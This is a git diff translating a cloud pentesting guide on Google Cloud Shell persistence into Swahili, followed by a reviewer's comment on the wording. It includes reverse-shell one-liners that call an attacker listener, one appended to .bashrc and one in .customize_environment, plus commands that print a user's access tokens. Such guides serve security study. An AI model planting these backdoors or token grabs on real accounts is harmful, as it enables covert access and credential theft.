Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

This commit is contained in:
Translator
2024-12-31 19:03:28 +00:00
parent 7770a50092
commit 44da2ea78f
244 changed files with 7940 additions and 10781 deletions


@@ -4,7 +4,7 @@
## Cloud Shell
For more information check:
Kwa maelezo zaidi angalia:
{{#ref}}
../gcp-services/gcp-cloud-shell-enum.md
@@ -12,62 +12,52 @@ For more information check:
### Persistent Backdoor
[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
[**Google Cloud Shell**](https://cloud.google.com/shell/) inakupa ufikiaji wa amri kwa rasilimali zako za wingu moja kwa moja kutoka kwa kivinjari chako bila gharama yoyote inayohusiana.
You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**.
Unaweza kufikia Cloud Shell ya Google kutoka **web console** au kwa kukimbia **`gcloud cloud-shell ssh`**.
This console has some interesting capabilities for attackers:
Konsoli hii ina uwezo wa kuvutia kwa washambuliaji:
1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org).
2. Said instance will **maintain its home directory for at least 120 days** if no activity happens.
3. There is **no capabilities for an organisation to monitor** the activity of that instance.
This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
1. **Mtumiaji yeyote wa Google mwenye ufikiaji wa Google Cloud** ana ufikiaji wa mfano wa Cloud Shell ulio na uthibitisho kamili (Akaunti za Huduma zinaweza, hata ikiwa ni Wamiliki wa shirika).
2. Mfano huo uta **hifadhi saraka yake ya nyumbani kwa angalau siku 120** ikiwa hakuna shughuli inayoendelea.
3. Hakuna **uwezo wa shirika kufuatilia** shughuli za mfano huo.
Hii kwa msingi inamaanisha kwamba mshambuliaji anaweza kuweka backdoor katika saraka ya nyumbani ya mtumiaji na kadri mtumiaji anavyounganisha na GC Shell kila siku 120 angalau, backdoor itadumu na mshambuliaji atapata shell kila wakati inapoendeshwa kwa kufanya:
```bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
```
There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
Kuna faili nyingine katika folda ya nyumbani inayoitwa **`.customize_environment`** ambayo, ikiwa ipo, itakuwa **inasanidi kila wakati** mtumiaji anapofikia **cloud shell** (kama katika mbinu ya awali). Ingiza backdoor ya awali au moja kama ifuatayo ili kudumisha uvumilivu kadri mtumiaji anavyotumia "mara kwa mara" cloud shell:
```bash
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
```
> [!WARNING]
> It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
> Ni muhimu kutambua kwamba **wakati wa kwanza kitendo kinachohitaji uthibitisho kinapofanywa**, dirisha la ruhusa linaonekana kwenye kivinjari cha mtumiaji. Dirisha hili lazima likubaliwe kabla ya amri kuweza kutekelezwa. Ikiwa dirisha lisilotarajiwa linaonekana, linaweza kuleta wasiwasi na huenda likaharibu njia ya kudumu inayotumika.
This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session:
Hii ni dirisha la pop-up kutoka kwa kutekeleza `gcloud projects list` kutoka kwa cloud shell (kama mshambuliaji) lililotazamwa katika kikao cha kivinjari cha mtumiaji:
<figure><img src="../../../images/image (10).png" alt=""><figcaption></figcaption></figure>
However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
Hata hivyo, ikiwa mtumiaji amekuwa akitumia cloudshell kwa shughuli, dirisha la pop-up halitaonekana na unaweza **kusanya tokens za mtumiaji kwa**:
```bash
gcloud auth print-access-token
gcloud auth application-default print-access-token
```
#### Jinsi muunganisho wa SSH unavyoanzishwa
#### How the SSH connection is stablished
Kimsingi, hizi API calls 3 zinatumika:
Basically, these 3 API calls are used:
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (itakufanya uongeze funguo yako ya umma uliyounda kwa ndani)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (itakufanya uanzishe mfano)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (itakueleza ip ya google cloud shell)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell)
Lakini unaweza kupata taarifa zaidi katika [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
## References
## Marejeo
- [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
- [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
- [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)
{{#include ../../../banners/hacktricks-training.md}}
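Review bot: the translated `.customize_environment` paragraph changes the meaning of the source sentence: "is going to be **executed everytime**" is rendered as "itakuwa **inasanidi kila wakati**", which reads as "will configure every time" rather than "will be executed every time"; suggest "itakuwa **inatekelezwa kila wakati**". In the same hunk, "running **`gcloud cloud-shell ssh`**" becomes "kwa kukimbia", the literal physical sense of running; "kwa kuendesha" is the usual wording for executing a command. The removed English heading "How the SSH connection is stablished" carried a typo, so the new heading "Jinsi muunganisho wa SSH unavyoanzishwa" is an improvement, and the code blocks, the `> [!WARNING]` callout prefix, the figure tag and the `{{#include ...}}` line are carried over unchanged, which is correct for a translation-only change.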